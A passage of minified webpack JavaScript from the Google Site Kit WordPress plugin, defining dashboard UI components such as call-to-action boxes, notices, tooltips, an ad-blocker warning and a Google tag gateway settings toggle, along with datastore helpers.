s=e[o];i[s]=i[s]>=1?i[s]+1:1,i[s]>1&&t.push(s)}return t}const S={actions:k,controls:j,reducer:f};function b(e){return t=>N(e(t))}const N=r()(e=>(0,a.mapValues)(e,(e,t)=>(...i)=>{const o=e(...i);return s()(void 0!==o,`${t}(...) is not resolved`),o}));function A(e,{negate:t=!1}={}){return{safeSelector:(0,l.N)(i=>(o,...s)=>{const n=!t,r=!!t;try{return e(i,o,...s),n}catch{return r}}),dangerousSelector:(0,l.N)(t=>(i,...o)=>{e(t,i,...o)})}}function C(e,t){return s()("function"==typeof e,"a validator function is required."),s()("function"==typeof t,"an action creator function is required."),s()("Generator"!==e[Symbol.toStringTag]&&"GeneratorFunction"!==e[Symbol.toStringTag],"an action’s validator function must not be a generator."),(...i)=>(e(...i),t(...i))}},8513:(e,t,i)=>{i.d(t,{Kk:()=>n,SZ:()=>o,Yw:()=>r,oJ:()=>a,tT:()=>s});const o="body",s=[o,"display","headline","label","title"],n="small",r="medium",a=[n,r,"large"]},8732:(e,t,i)=>{i.d(t,{$:()=>n,D:()=>s});var o=i(20697);const s="core/notifications",n=[o.uR,o.jU,o.f7,o.Ax,o.Is]},10740:(e,t,i)=>{i.d(t,{$z:()=>s.$,CR:()=>a.C,Cf:()=>l.DialogContent,Es:()=>l.DialogFooter,Nv:()=>o.N,P3:()=>r.P,Si:()=>n.S,fI:()=>g.fI,fh:()=>g.fh,lG:()=>c.a,xA:()=>g.xA});var o=i(91046),s=i(3412),n=i(30454),r=i(26569),a=i(56655),l=i(12786),c=i.n(l),g=i(84984)},11193:(e,t,i)=>{i.d(t,{D:()=>n});var o=i(32091),s=i.n(o);function n(e,{dateRangeLength:t}){s()(Array.isArray(e),"report must be an array to partition."),s()(Number.isInteger(t)&&t>0,"dateRangeLength must be a positive integer.");const i=-1*t;return{currentRange:e.slice(i),compareRange:e.slice(2*i,i)}}},12317:(e,t,i)=>{i.d(t,{A:()=>d});var o=i(62688),s=i.n(o),n=i(4452),r=i.n(n),a=i(49383),l=i(38432),c=i(33052),g=i(62540);function CTA({title:e,headerText:t,headerContent:i,description:o,ctaLink:s,ctaLabel:n,ctaLinkExternal:d,ctaType:u,error:p,onClick:m,"aria-label":I,children:y}){return(0,g.jsxs)("div",{className:r()("googlesitekit-cta",{"googlesitekit-cta--error":p}),children:[(t||i)&&(0,g.jsxs)("div",{className:"googlesitekit-cta__header",children:[t&&(0,g.jsx)(c.A,{as:"h2",size:"small",type:"label",className:"googlesitekit-cta__header_text",children:t}),i]}),(0,g.jsxs)("div",{className:"googlesitekit-cta__body",children:[e&&(0,g.jsx)(c.A,{as:"h3",size:"small",type:"title",className:"googlesitekit-cta__title",children:e}),o&&"string"==typeof o&&(0,g.jsx)("p",{className:"googlesitekit-cta__description",children:o}),o&&"string"!=typeof o&&(0,g.jsx)("div",{className:"googlesitekit-cta__description",children:o}),n&&"button"===u&&(0,g.jsx)(a.Button,{"aria-label":I,href:s,onClick:m,children:n}),n&&"link"===u&&(0,g.jsx)(l.A,{href:s,onClick:m,"aria-label":I,external:d,hideExternalIndicator:d,arrow:!0,children:n}),y]})]})}CTA.propTypes={title:s().string.isRequired,headerText:s().string,description:s().oneOfType([s().string,s().node]),ctaLink:s().string,ctaLinkExternal:s().bool,ctaLabel:s().string,ctaType:s().string,"aria-label":s().string,error:s().bool,onClick:s().func,children:s().node,headerContent:s().node},CTA.defaultProps={title:"",headerText:"",headerContent:"",description:"",ctaLink:"",ctaLabel:"",ctaType:"link",error:!1,onClick:()=>{}};const d=CTA},13137:(e,t,i)=>{i.d(t,{G:()=>c,HY:()=>d,SG:()=>g,db:()=>s,e4:()=>p,vl:()=>u});i(17243);var o=i(82871);const s="missing_required_scopes",n="insufficientPermissions",r="forbidden",a="internal_server_error",l="invalid_json";function c(e){return e?.code===s}function g(e){return[n,r].includes(e?.data?.reason)}function d(e){return!!e?.data?.reconnectURL}function u(e,t){return!(!t?.storeName||g(e)||c(e)||d(e))}function p(e){return e?.code===a?(0,o.__)("There was a critical error on this website while fetching data","google-site-kit"):e?.code===l?(0,o.__)("The server provided an invalid response","google-site-kit"):e?.message}},13620:e=>{e.exports=googlesitekit.modules},17443:(e,t,i)=>{i.d(t,{r:()=>AdminScreenTooltip,i:()=>o.i});var o=i(52274),s=i(63696),n=i(50539),r=i(62688),a=i(36703),l=i(40960),c=i(83202),g=i(94656),d=i(71264),u=i(97513),p=i(62540);function JoyrideTooltip(e){const{title:t,content:o,dismissLabel:n,disableOverlay:r=!0,target:m,cta:I=!1,className:y,styles:h={},slug:f="",placement:M="auto",onDismiss:k=()=>{},onView:j=()=>{},onTourStart:v=()=>{},onTourEnd:S=()=>{}}=e;function b(){return!!i.g.document.querySelector(m)}const[N,A]=(0,s.useState)(b),C=(0,u.dv)(),x=C===u.mp||C===u.Lg,[D,T]=(0,s.useState)(!0),w=(0,s.useRef)(x);if((0,l.A)(()=>{b()&&A(!0)},N?null:250),(0,s.useEffect)(()=>{let e=()=>{};if("function"==typeof i.g.ResizeObserver){const t=i.g.document.querySelector(m);if(t){const o=new ResizeObserver(()=>{i.g.dispatchEvent(new Event("resize"))});o.observe(t),e=()=>o.disconnect()}}return e},[m,N]),(0,s.useEffect)(()=>{let e;return w.current!==x&&(T(!1),e=setTimeout(()=>{T(!0)},50),w.current=x),()=>{e&&clearTimeout(e)}},[x]),!N)return null;const _=[{title:t,target:m,content:o,disableBeacon:!0,isFixed:!0,placement:M,cta:I,className:y}],E={close:n,last:n};return(0,p.jsx)(g.A,{slug:f,children:(0,p.jsx)(a.Ay,{callback:function({type:e}){switch(e){case a.qY.TOUR_START:v(),i.g.document.body.classList.add("googlesitekit-showing-tooltip");break;case a.qY.TOUR_END:S(),i.g.document.body.classList.remove("googlesitekit-showing-tooltip");break;case a.qY.STEP_AFTER:k();break;case a.qY.TOOLTIP:j()}},disableOverlay:r,spotlightPadding:0,floaterProps:d.ei,locale:E,steps:_,styles:{...d.R0,...h,options:{...d.R0.options,...h?.options},spotlight:{...d.R0.spotlight,...h?.spotlight}},tooltipComponent:c.A,run:D,disableScrolling:!0})})}JoyrideTooltip.propTypes={title:r.PropTypes.node,content:r.PropTypes.string,disableOverlay:r.PropTypes.bool,dismissLabel:r.PropTypes.string,target:r.PropTypes.string.isRequired,onDismiss:r.PropTypes.func,onShow:r.PropTypes.func,className:r.PropTypes.string,styles:r.PropTypes.object,slug:r.PropTypes.string,placement:r.PropTypes.string,onView:r.PropTypes.func};var m=i(7972),I=i(6109),y=i(62659);function AdminScreenTooltip(){const e=(0,y.A)(),{setValue:t}=(0,n.useDispatch)(m.n),i=(0,u.dv)(),{isTooltipVisible:o=!1,target:r,placement:a,className:l,tooltipSlug:c,title:g,content:d,dismissLabel:h}=(0,n.useSelect)(e=>e(m.n).getValue("admin-screen-tooltip")||{isTooltipVisible:!1});const f=(0,s.useCallback)(()=>{c&&(0,I.sx)(`${e}_${c}`,"tooltip_dismiss"),t("admin-screen-tooltip",void 0)},[t,c,e]);if(!o)return null;const M=i===u.mp||i===u.Lg,k=null!=r?r:'#adminmenu [href*="page=googlesitekit-settings"]',j=null!=a?a:"right";return(0,p.jsx)(JoyrideTooltip,{target:M?"body":k,placement:M?"center":j,className:M?"googlesitekit-tour-tooltip__modal_step":l||(r?void 0:"googlesitekit-tour-tooltip__fixed-settings-tooltip"),disableOverlay:!M,slug:"admin-screen-tooltip",title:g,content:d,dismissLabel:h,onView:function(){(0,I.sx)(`${e}_${c}`,"tooltip_view")},onDismiss:f})}},19793:(e,t,i)=>{i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var o,s=i(63696);function n(){return n=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var o in i)({}).hasOwnProperty.call(i,o)&&(e[o]=i[o])}return e},n.apply(null,arguments)}const __WEBPACK_DEFAULT_EXPORT__=e=>s.createElement("svg",n({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},e),o||(o=s.createElement("path",{fill:"currentColor",fillRule:"evenodd",d:"M12 1C5.925 1 1 5.925 1 12s4.925 11 11 11 11-4.925 11-11S18.075 1 12 1m4.806 8.592.592-.806-1.612-1.184-.592.806-3.89 5.296c-.166.226-.36.296-.512.296s-.346-.07-.512-.296l-1.474-2.007-.592-.806-1.612 1.184.592.806 1.474 2.007C9.191 15.6 9.971 16 10.792 16s1.6-.4 2.124-1.112z",clipRule:"evenodd"})))},19826:(e,t,i)=>{i.d(t,{Ay:()=>r,Kq:()=>n});const o=(0,i(63696).createContext)(""),{Consumer:s,Provider:n}=o,r=o},20697:(e,t,i)=>{i.d(t,{Ax:()=>n,CZ:()=>g,Ej:()=>S,Gw:()=>b,Is:()=>r,KK:()=>u,Nn:()=>A,OT:()=>j,SH:()=>k,Y$:()=>p,ZS:()=>a,bg:()=>y,en:()=>v,ep:()=>I,f7:()=>s,hi:()=>m,jU:()=>o,k$:()=>f,kz:()=>N,ly:()=>l,mo:()=>h,s3:()=>M,uR:()=>c,zx:()=>d});const o="mainDashboard",s="entityDashboard",n="mainDashboardViewOnly",r="entityDashboardViewOnly",a="userInput",l="activation",c="splash",g="adminBar",d="adminBarViewOnly",u="settings",p="adBlockingRecovery",m="wpDashboard",I="wpDashboardViewOnly",y="moduleSetup",h="metricSelection",f="wpBlockEditor",M="keyMetricsSetup",k="key-metrics",j="traffic",v="content",S="speed",b="monetization",N=[o,s,n,r,a,c,u,y,h],A=[n,r,d,I]},22942:(e,t,i)=>{i.d(t,{A_:()=>g,DF:()=>u,L1:()=>p,M0:()=>r,Mc:()=>a,Ok:()=>c,U9:()=>l,iW:()=>n,ue:()=>s,wq:()=>o,xR:()=>d});const o=1,s=2,n=3,r="enhanced-measurement-activation-banner-tooltip-state",a="enhanced-measurement-activation-banner-dismissed-item",l="_r.explorerCard..selmet",c="_r.explorerCard..seldim",g="_r..dataFilters",d="_r..nav",u="key-metrics-connect-ga4-cta-widget",p="analytics-4"},23955:(e,t,i)=>{i.d(t,{A:()=>AdBlockerWarning});var o,s=i(62688),n=i.n(s),r=i(50539),a=i(29785),l=i(88273),c=i(82871),g=i(13606),d=i(38432),u=i(63696);function p(){return p=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var o in i)({}).hasOwnProperty.call(i,o)&&(e[o]=i[o])}return e},p.apply(null,arguments)}const m=e=>u.createElement("svg",p({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 13 14"},e),o||(o=u.createElement("path",{stroke:"currentColor",strokeWidth:1.5,d:"M4.5 1.5H3a2 2 0 0 0-2 2v7a2 2 0 0 0 2 2h7a2 2 0 0 0 2-2V9M7 1.5h5v5M5 8.5 11.5 2"})));var I=i(25797),y=i(62540);function AdBlockerWarningMessage({getHelpLink:e="",warningMessage:t=null}){return t?(0,y.jsx)(I.A,{className:"googlesitekit-notice--small",type:I.A.TYPES.WARNING,description:(0,g.A)((0,c.sprintf)(/* translators: 1: The warning message. 2: "Get help" text. */ /* translators: 1: The warning message. 2: "Get help" text. */ (0,c.__)("%1$s. <Link><Strong>%2$s</Strong></Link>","google-site-kit"),t,(0,c.__)("Get help","google-site-kit")),{Link:(0,y.jsx)(d.A,{href:e,trailingIcon:(0,y.jsx)(m,{width:15,height:15}),external:!0,hideExternalIndicator:!0}),Strong:(0,y.jsx)("strong",{})}),hideIcon:!0}):null}function AdBlockerWarning({moduleSlug:e,className:t}){const i=(0,r.useSelect)(t=>t(l.i).getModuleStoreName(e)),o=(0,r.useSelect)(e=>e(i)?.getAdBlockerWarningMessage()),s=(0,r.useSelect)(t=>t(a.O4).getDocumentationLinkURL(`${e}-ad-blocker-detected`));return(0,y.jsx)(AdBlockerWarningMessage,{className:t,getHelpLink:s,warningMessage:o})}AdBlockerWarningMessage.propTypes={getHelpLink:n().string,warningMessage:n().string},AdBlockerWarning.propTypes={className:n().string,moduleSlug:n().string.isRequired}},24355:(e,t,i)=>{i.d(t,{SO:()=>a});var o=i(55620),s=i(99123);function n(){return[i.g.innerWidth,i.g.innerHeight]}function r({fps:e=60,leading:t=!1,initialWidth:i=0,initialHeight:r=0}={}){const[a,l]=(0,o._)("undefined"==typeof document?[i,r]:n,e,t);function c(){return l(n)}return(0,s.A)(window,"resize",c),(0,s.A)(window,"orientationchange",c),a}function a(e={}){return r(e)[0]}},25797:(e,t,i)=>{i.d(t,{A:()=>M});var o,s=i(62688),n=i.n(s),r=i(4452),a=i.n(r),l=i(63696),c=i(19793);function g(){return g=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var o in i)({}).hasOwnProperty.call(i,o)&&(e[o]=i[o])}return e},g.apply(null,arguments)}const warning_notice=e=>l.createElement("svg",g({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},e),o||(o=l.createElement("path",{fill:"currentColor",d:"M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1m0 14a1.5 1.5 0 1 0 0 3 1.5 1.5 0 0 0 0-3m-1-2h2V6h-2z"})));var d=i(42343),u=i(76984),p=i(62540);const m={[u.Q.NEW]:d.A,[u.Q.SUCCESS]:c.A,[u.Q.INFO]:warning_notice,[u.Q.WARNING]:warning_notice,[u.Q.ERROR]:warning_notice};function Icon({type:e}){const t=m[e]||warning_notice;return(0,p.jsx)(t,{width:24,height:24})}function Title({className:e,children:t}){return(0,p.jsx)("p",{className:a()("googlesitekit-notice__title",e),children:t})}function Description({className:e,children:t}){return(0,p.jsx)("p",{className:a()("googlesitekit-notice__description",e),children:t})}Icon.propTypes={type:n().oneOf(Object.values(u.Q))},Title.propTypes={className:n().string,children:n().node},Description.propTypes={className:n().string,children:n().node};var I=i(49383),y=i(83366);function CTAButton({label:e,disabled:t,inProgress:i,onClick:o,href:s,external:n=!1,hideExternalIndicator:r=!1}){let l;return n&&!r&&(l=(0,p.jsx)(y.A,{width:14,height:14})),(0,p.jsx)(I.SpinnerButton,{className:a()("googlesitekit-notice__cta",{"googlesitekit-notice__cta--spinner__running":i}),disabled:t,isSaving:i,onClick:o,href:s,target:n?"_blank":void 0,trailingIcon:l,children:e})}CTAButton.propTypes={label:n().string.isRequired,disabled:n().bool,inProgress:n().bool,onClick:n().func,href:n().string,external:n().bool,hideExternalIndicator:n().bool};var h=i(82871);function DismissButton({label:e=(0,h.__)("Got it","google-site-kit"),onClick:t,disabled:i}){return(0,p.jsx)(I.Button,{onClick:t,disabled:i,tertiary:!0,children:e})}DismissButton.propTypes={label:n().string,onClick:n().func.isRequired,disabled:n().bool};const f=(0,l.forwardRef)(({className:e,title:t,description:i,dismissButton:o,ctaButton:s,type:n=u.Q.INFO,children:r,hideIcon:l},c)=>(0,p.jsxs)("div",{ref:c,className:a()("googlesitekit-notice",`googlesitekit-notice--${n}`,e),children:[!l&&(0,p.jsx)("div",{className:"googlesitekit-notice__icon",children:(0,p.jsx)(Icon,{type:n})}),(0,p.jsxs)("div",{className:"googlesitekit-notice__content",children:[t&&(0,p.jsx)(Title,{children:t}),i&&(0,p.jsx)(Description,{children:i})]}),(o?.label||o?.onClick||s?.label&&(s?.onClick||s?.href)||r)&&(0,p.jsxs)("div",{className:"googlesitekit-notice__action",children:[r,(o?.label||o?.onClick)&&(0,p.jsx)(DismissButton,{label:o.label,onClick:o.onClick,disabled:o.disabled}),s?.label&&(s?.onClick||s?.href)&&(0,p.jsx)(CTAButton,{label:s.label,onClick:s.onClick,inProgress:s.inProgress,disabled:s.disabled,href:s.href,external:s.external,hideExternalIndicator:s.hideExternalIndicator})]})]}));f.TYPES=u.Q,f.propTypes={className:n().string,title:n().oneOfType([n().string,n().object]),description:n().node,type:n().oneOf(Object.values(u.Q)),dismissButton:n().shape(DismissButton.propTypes),ctaButton:n().shape({...CTAButton.propTypes,label:n().string}),children:n().node,hideIcon:n().bool};const M=f},29785:(e,t,i)=>{i.d(t,{O4:()=>o,OQ:()=>n,qc:()=>s});const o="core/site",s="primary",n="secondary"},30289:(e,t,i)=>{i.d(t,{A:()=>l});var o=i(63560),s=i(62688),n=i.n(s),r=i(63696),a=i(62540);function l(e){function WithIntersectionObserverComponent({onInView:t,...i}){const s=(0,r.useRef)(),n=(0,o.A)(s,{root:null,threshold:.45}),[l,c]=(0,r.useState)(!1),g=!!n?.isIntersecting&&!!n?.intersectionRatio;return(0,r.useEffect)(()=>{n&&g&&!l&&(t(),c(!0))},[l,g,n,t]),(0,a.jsx)(e,{ref:s,...i})}return WithIntersectionObserverComponent.displayName="WithIntersectionObserverComponent",(e.displayName||e.name)&&(WithIntersectionObserverComponent.displayName+=`(${e.displayName||e.name})`),WithIntersectionObserverComponent.propTypes={onInView:n().func.isRequired,...e.propTypes},WithIntersectionObserverComponent}},30805:(e,t,i)=>{i.d(t,{i:()=>r});var o=i(63696),s=i(79961),n=i(84895);function r(e){const t=(0,o.useContext)(s.A);return(0,n.G)(e,t)}},30979:(e,t,i)=>{function o(e){return"string"==typeof e&&""!==e&&/^AW-[0-9]+$/.test(e)}i.d(t,{EL:()=>o})},31012:(e,t,i)=>{i.d(t,{c:()=>r});var o=i(82871),s=i(32803),n=i(22942);function r(e="",t={}){const{slug:i="",name:r="",owner:a={}}=t||{};if(!i||!r)return e;let l="",c="";return n.L1===i?e.match(/account/i)?l=(0,o.__)("Your Google account does not have sufficient permissions for this Analytics account, so you won’t be able to see stats from it on the Site Kit dashboard.","google-site-kit"):e.match(/property/i)?l=(0,o.__)("Your Google account does not have sufficient permissions for this Analytics property, so you won’t be able to see stats from it on the Site Kit dashboard.","google-site-kit"):e.match(/view/i)&&(l=(0,o.__)("Your Google account does not have sufficient permissions for this Analytics view, so you won’t be able to see stats from it on the Site Kit dashboard.","google-site-kit")):s.Y===i&&(l=(0,o.__)("Your Google account does not have sufficient permissions for this Search Console property, so you won’t be able to see stats from it on the Site Kit dashboard.","google-site-kit")),l||(l=(0,o.sprintf)(/* translators: %s: module name */ /* translators: %s: module name */ (0,o.__)("Your Google account does not have sufficient permissions to access %s data, so you won’t be able to see stats from it on the Site Kit dashboard.","google-site-kit"),r)),a&&a.login&&(c=(0,o.sprintf)(/* translators: %s: owner name */ /* translators: %s: owner name */ (0,o.__)('This service was originally connected by the administrator "%s" — you can contact them for more information.',"google-site-kit"),a.login)),c||(c=(0,o.__)("This service was originally connected by an administrator — you can contact them for more information.","google-site-kit")),`${l} ${c}`}},32600:(e,t,i)=>{i.d(t,{A:()=>NoticeNotification});var o=i(25797),s=i(68761),n=i(50539),r=i(8732),a=i(10740),l=i(62688),c=i.n(l),g=i(62540);function NoticeNotification({notificationID:e,children:t,dismissButton:i,ctaButton:l,gaTrackingEventArgs:c,...d}){const u=(0,s.A)(e),{dismissNotification:p}=(0,n.useDispatch)(r.D);return(0,g.jsx)(a.xA,{children:(0,g.jsx)(a.fI,{children:(0,g.jsx)(a.fh,{size:12,alignMiddle:!0,children:(0,g.jsx)(o.A,{dismissButton:{...i,onClick:async function(t){await(i?.onClick?.(t)),u.dismiss(c?.label,c?.value),p(e,{...i?.dismissOptions||{}})}},ctaButton:{...l,onClick:async function(t){u.confirm(c?.label,c?.value),await(l?.onClick?.(t)),l?.dismissOnClick&&p(e,{...l?.dismissOptions})}},...d,children:t})})})})}NoticeNotification.propTypes={notificationID:c().string.isRequired,children:c().node,dismissButton:c().oneOfType([c().bool,c().object]),ctaButton:c().object,gaTrackingEventArgs:c().object}},32803:(e,t,i)=>{i.d(t,{Y:()=>o});const o="search-console"},33052:(e,t,i)=>{i.d(t,{A:()=>Typography});var o=i(62688),s=i.n(o),n=i(4452),r=i.n(n),a=i(8513),l=i(62540);function Typography({className:e,type:t,size:i,as:o="span",children:s,...n}){return(0,l.jsx)(o,{className:r()("googlesitekit-typography",e,{[`googlesitekit-typography--${t}`]:t&&a.tT.includes(t),[`googlesitekit-typography--${i}`]:i&&a.oJ.includes(i)}),...n,children:s})}Typography.propTypes={className:s().string,type:s().oneOf(a.tT),size:s().oneOf(a.oJ),as:s().oneOfType([s().string,s().elementType])}},35403:(e,t,i)=>{i.d(t,{A:()=>GoogleTagGatewayToggle});var o=i(4452),s=i.n(o),n=i(15844),r=i(63696),a=i(13606),l=i(82871),c=i(49383),g=i(50539),d=i(29785),u=i(5855),p=i(38432),m=i(62659),I=i(6109),y=i(30289),h=i(25797),f=i(62540);const M=(0,y.A)(h.A);function GoogleTagGatewayToggle({className:e}){const t=(0,m.A)(),i=(0,g.useSelect)(e=>e(d.O4).isGoogleTagGatewayEnabled()),o=(0,g.useSelect)(e=>e(d.O4).isFetchingGetGTGServerRequirementStatus()),y=(0,g.useSelect)(e=>{const{isGTGHealthy:t,isScriptAccessEnabled:i}=e(d.O4);return!1!==t()&&!1!==i()}),{fetchGetGTGServerRequirementStatus:k,setGoogleTagGatewayEnabled:j}=(0,g.useDispatch)(d.O4),v=(0,g.useSelect)(e=>e(d.O4).getDocumentationLinkURL("google-tag-gateway-introduction")),S=(0,g.useSelect)(e=>e(d.O4).getDocumentationLinkURL("google-tag-gateway-server-requirements"));(0,n.A)(k);const b=(0,r.useCallback)(()=>{const e=i?"deactivate_google_tag_gateway":"activate_google_tag_gateway";(0,I.sx)(`${t}_gtg-settings-toggle`,e).finally(()=>{j(!i)})},[i,j,t]);return(0,f.jsxs)("div",{className:s()("googlesitekit-google-tag-gateway-toggle",e),children:[o&&(0,f.jsx)(c.ProgressBar,{className:"googlesitekit-google-tag-gateway-toggle__progress",small:!0}),!o&&(0,f.jsxs)("div",{className:"googlesitekit-module-settings-group__switch",children:[(0,f.jsx)(c.Switch,{label:(0,l.__)("Google tag gateway for advertisers","google-site-kit"),checked:!!i&&y,disabled:!y,onClick:b,hideLabel:!1}),(0,f.jsx)("div",{className:"googlesitekit-google-tag-gateway-toggle__switch-badge",children:(0,f.jsx)(u.A,{className:"googlesitekit-badge--beta",label:(0,l.__)("Beta","google-site-kit"),hasLeftSpacing:!0})})]}),(0,f.jsx)("p",{className:"googlesitekit-module-settings-group__helper-text",children:(0,a.A)((0,l.__)("Your tag data will be sent through your own domain to improve data quality and help you recover measurement signals. <a>Learn more</a>","google-site-kit"),{a:(0,f.jsx)(p.A,{href:v,onClick:()=>{(0,I.sx)(`${t}_gtg-settings-toggle`,"click_learn_more_link")},"aria-label":(0,l.__)("Learn more about Google tag gateway for advertisers","google-site-kit"),external:!0})})}),!o&&!y&&(0,f.jsx)(M,{type:h.A.TYPES.WARNING,title:(0,a.A)((0,l.__)("Your server’s current settings prevent Google tag gateway for advertisers from working. To enable it, please contact your hosting provider and request access to external resources and plugin files. <a>Learn more</a>","google-site-kit"),{a:(0,f.jsx)(p.A,{href:S,onClick:()=>{(0,I.sx)(`${t}_gtg-settings-toggle-disabled`,"click_learn_more_link")},"aria-label":(0,l.__)("Learn more about Google tag gateway for advertisers server requirements","google-site-kit"),external:!0})}),variant:"warning",onInView:()=>{(0,I.sx)(`${t}_gtg-settings-toggle-disabled`,"view_notice")}})]})}},35410:(e,t,i)=>{i.d(t,{A:()=>SetupPluginConversionTrackingNotice});var o=i(4452),s=i.n(o),n=i(50539),r=i(29785),a=i(62540);function SetupPluginConversionTrackingNotice({className:e,message:t}){const i=(0,n.useSelect)(e=>e(r.O4).isConversionTrackingEnabled());return i||void 0===i?null:(0,a.jsx)("p",{className:s()(e,"googlesitekit-color--surfaces-on-background-variant googlesitekit-plugin-conversion-tracking-notice"),children:t})}},35812:(e,t,i)=>{i.d(t,{U:()=>I});var o=i(32091),s=i.n(o),n=i(17243),r=i(73866),a=i(74426),l=i(6109),c=i(50539);function g(e){return e}function d(){return{}}function u(){}const{clearError:p,receiveError:m}=r.o1;function I({baseName:e,controlCallback:t,reducerCallback:i=g,argsToParams:o=d,validateParams:r=u}){let I;s()(e,"baseName is required."),s()("function"==typeof t,"controlCallback is required and must be a function."),s()("function"==typeof i,"reducerCallback must be a function."),s()("function"==typeof o,"argsToParams must be a function."),s()("function"==typeof r,"validateParams must be a function.");try{r(o()),I=!1}catch(e){I=!0}const y=(0,a.m2)(e),h=(0,a.sP)(e),f=`FETCH_${h}`,M=`START_${f}`,k=`FINISH_${f}`,j=`CATCH_${f}`,v=`RECEIVE_${h}`,S=`fetch${y}`,b=`receive${y}`,N=`isFetching${y}`,A={[N]:{}};const C={[S](...t){const i=o(...t);return r(i),function*(t,i){let o,s;yield{payload:{params:t},type:M},yield p(e,i);try{o=yield{payload:{params:t},type:f},yield C[b](o,t),yield{payload:{params:t},type:k}}catch(o){s=o,yield m(s,e,i),yield{payload:{params:t},type:j}}return{response:o,error:s}}(i,t)},[b]:(e,t)=>(s()(void 0!==e,"response is required."),I?(s()((0,n.isPlainObject)(t),"params is required."),r(t)):t={},{payload:{response:e,params:t},type:v})},x={[f]:({payload:e})=>t(e.params)},D=(0,c.createReducer)((e,{type:t,payload:o})=>{switch(t){case M:{const{params:t}=o;return e[N]=e[N]||{},e[N][(0,l.Zm)(t)]=!0,e}case v:{const{response:t,params:s}=o;return i(e,t,s)}case k:{const{params:t}=o;return e[N]=e[N]||{},e[N][(0,l.Zm)(t)]=!1,e}case j:{const{params:t}=o;return e[N]=e[N]||{},e[N][(0,l.Zm)(t)]=!1,e}default:return e}});return{initialState:A,actions:C,controls:x,reducer:D,resolvers:{},selectors:{[N]:(e,...t)=>{if(void 0===e[N])return!1;let i;try{i=o(...t),r(i)}catch(e){return!1}return!!e[N][(0,l.Zm)(i)]}}}}},37467:(e,t,i)=>{i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var o=i(63696),s=i(82286),n=i(51568);const __WEBPACK_DEFAULT_EXPORT__=function(e,t,r=i.g){const[a,l]=(0,o.useState)((0,s.d)(r.location.href,e)||t);return[a,function(t){l(t);const i=(0,n.F)(r.location.href,{[e]:t});r.history.replaceState(null,"",i)}]}},38017:(e,t,i)=>{i.d(t,{A:()=>l});var o=i(62688),s=i.n(o),n=i(4452),r=i.n(n),a=i(62540);function ChangeArrow({direction:e,invertColor:t,width:i,height:o}){return(0,a.jsx)("svg",{className:r()("googlesitekit-change-arrow",`googlesitekit-change-arrow--${e}`,{"googlesitekit-change-arrow--inverted-color":t}),width:i,height:o,viewBox:"0 0 10 10",fill:"none",xmlns:"http://www.w3.org/2000/svg",children:(0,a.jsx)("path",{d:"M5.625 10L5.625 2.375L9.125 5.875L10 5L5 -1.76555e-07L-2.7055e-07 5L0.875 5.875L4.375 2.375L4.375 10L5.625 10Z",fill:"currentColor"})})}ChangeArrow.propTypes={direction:s().string,invertColor:s().bool,width:s().number,height:s().number},ChangeArrow.defaultProps={direction:"up",invertColor:!1,width:9,height:9};const l=ChangeArrow},38432:(e,t,i)=>{i.d(t,{A:()=>x});var o,s=i(4452),n=i.n(s),r=i(62688),a=i.n(r),l=i(39941),c=i(63696),g=i(82871);function d(){return d=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var o in i)({}).hasOwnProperty.call(i,o)&&(e[o]=i[o])}return e},d.apply(null,arguments)}const u=e=>c.createElement("svg",d({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 13 13"},e),o||(o=c.createElement("g",{fill:"none",fillRule:"evenodd"},c.createElement("circle",{cx:6.5,cy:6.5,r:6.5,fill:"currentColor"}),c.createElement("path",{fill:"#FFF",d:"M3.461 6.96h5.15L6.36 9.21a.464.464 0 0 0 .325.79.46.46 0 0 0 .325-.135l3.037-3.038a.46.46 0 0 0 0-.65L7.015 3.135a.46.46 0 0 0-.65.65L8.61 6.039H3.461a.46.46 0 0 0-.461.46c0 .254.207.462.461.462z"}),".")));var p;function m(){return m=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var o in i)({}).hasOwnProperty.call(i,o)&&(e[o]=i[o])}return e},m.apply(null,arguments)}const I=e=>c.createElement("svg",m({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 13 13"},e),p||(p=c.createElement("g",{fill:"none",fillRule:"evenodd"},c.createElement("circle",{cx:6.5,cy:6.5,r:6.5,fill:"#FFF"}),c.createElement("path",{fill:"currentColor",d:"M3.461 6.96h5.15L6.36 9.21a.464.464 0 0 0 .325.79.46.46 0 0 0 .325-.135l3.037-3.038a.46.46 0 0 0 0-.65L7.015 3.135a.46.46 0 0 0-.65.65L8.61 6.039H3.461a.46.46 0 0 0-.461.46c0 .254.207.462.461.462z"}),".")));var y;function h(){return h=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var o in i)({}).hasOwnProperty.call(i,o)&&(e[o]=i[o])}return e},h.apply(null,arguments)}const f=e=>c.createElement("svg",h({xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},e),y||(y=c.createElement("path",{d:"m12 20-8-8 8-8 1.425 1.4-5.6 5.6H20v2H7.825l5.6 5.6z"})));var M=i(83366),k=i(50304),j=i(62540);const v="BUTTON",S="BUTTON_DISABLED",b="EXTERNAL_LINK",N="LINK",A="ROUTER_LINK",C=(0,c.forwardRef)((e,t)=>{const{"aria-label":i,secondary:o=!1,arrow:s=!1,back:r=!1,caps:a=!1,children:c,className:d="",danger:p=!1,disabled:m=!1,external:y=!1,hideExternalIndicator:h=!1,href:C="",inverse:x=!1,noFlex:D=!1,onClick:T,small:w=!1,standalone:_=!1,linkButton:E=!1,to:R,leadingIcon:L,trailingIcon:P,...O}=e;const G=C||R||!T?R?A:y?b:N:m?S:v;const z=G===v||G===S?"button":G===A?l.N_:"a",Z=function(){let e;return G===b&&(e=(0,g._x)("(opens in a new tab)","screen reader 